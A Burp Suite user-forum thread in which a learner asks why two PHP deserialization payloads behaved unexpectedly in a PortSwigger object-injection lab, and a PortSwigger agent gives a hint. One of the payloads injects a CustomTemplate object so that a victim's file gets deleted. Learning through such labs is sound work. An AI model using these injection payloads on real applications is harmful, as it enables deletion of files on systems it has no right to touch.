Burp Suite User Forum

Create new post

Strange "correct" solution in PHP Deserialization vuln exercise

Arvind | Last updated: Feb 23, 2023 08:06PM UTC

Hi, I'm refering to a challenge at https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php. It's strange because the payload I thought should work didn't? (or maybe I just didn't notice it?) and something which should 100% not have worked umm did? I wanted to reach out and share both payloads with you and see if you can tell what happened? Successful (WRONG) payload: O:4:"User”:3:{s:8:”username";s:6:"wiener";s:12:"access_token";s:32:"nwl7hz1cx2yvfhrzlyvjcdxcagrjhuhh”;s:1:”a”;s:1:”b”;} Unsuccessful (IMO correct) payload: O:14:"CustomTemplate":2:{s:18:"template_file_path”;s:5:”/home”;s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";} Thanks Arvind

Michelle, PortSwigger Agent | Last updated: Feb 24, 2023 03:15PM UTC

Hi Have you ried following along with the Community Solutions video and taking a closer look at the lock_file_path attribute?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.